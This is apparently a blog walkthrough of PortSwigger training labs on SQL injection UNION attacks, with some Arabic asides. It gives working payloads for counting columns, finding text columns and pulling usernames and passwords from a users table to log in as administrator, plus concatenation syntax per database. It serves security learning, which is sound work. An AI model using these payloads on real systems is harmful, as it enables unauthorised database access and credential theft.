Server-Side Attacks | SQL Injection contexts WalkThrough -PortSwigger Labs -Part1-
Hello My Friends, Today I will show you how You can solve all Challenges Portswigger Labs, and I explain All Vulnerability. when I started To solving The Labs, I had a problem that I wasn’t Good enough in PHP, js, and SQL. So make sure to study this Language to understand all payloads and Vulnerabilities .
In This part I will solve SQL injection UNION attack :
Lab 1 : SQL injection UNION attack, determining the number of columns returned by the query :
- In this Lab determine The number of columns returned by The query .
- Product category is filter .
- We use UNION attack to retrieve Data from other tables .
First of all , I Test UNION attack in category
parameter and I observed that an error occurs , This let me believe that’s vulnerable to SQLi .
Use Burp Suite to intercept the Request and send it to Repeater , Then Modify the category
parameter to add an additional column containing a null value ,
try :
‘ UNION select NULL —
‘ UNION select NULL,NULL —
‘ UNION select NULL,NULL,NULL —
etc.
لازم نحدد العدد الصحيح للاعمدة
Ps : Encode The query
That’s means we have 3 columns .
Congratulations, you solved the lab!
WAIT !!
Another way to find The number of columns :
Test with ORDER BY
Payload and when You get an error That’s means we don’t have a Columns.
‘ ORDER BY 1 —
‘ ORDER BY 2 —
‘ ORDER BY 3 —
etc.
لازم نعطي العدد الصحيح للاعمدة
Lab 2 : SQL injection UNION attack, finding a column containing text :
In This Lab we use UNION attack To retrieve data from tables.
First we need to determine the number of columns ,
- use
ORDER BY 3 --
And we Make the database retrieve the string : ‘****’
Congratulations, you solved the lab!
Lab 3 : SQL injection UNION attack, retrieving data from other tables
In this Lab we retrieve data from specific Table called Users , with 2 columns called Username and password .
- Determine number of columns
- Use this query ‘ UNION SELECT username,password FROM users —
and log in to the account as an administrator.
Lab 4 : SQL injection UNION attack, retrieving multiple values in a single column .
In this Lab we need to retrieving multiple values in a single column .
So first, Test the columns that contain text data,
- use : ‘ UNION SELECT NULL,’absc’ —
and we can Concatenate together multiple strings to make a single string to retrieve the contents of the users table :
‘ UNION SELECT NULL,username||’~’||password FROM users —
then Go login :
You can concatenate together multiple strings to make a single string.
Oracle ‘foo’||’bar’
Microsoft ‘foo’+’bar’
PostgreSQL ‘foo’||’bar’
MySQL ‘foo’ ‘bar’ [Note the space between the two strings]
CONCAT(‘foo’,’bar’)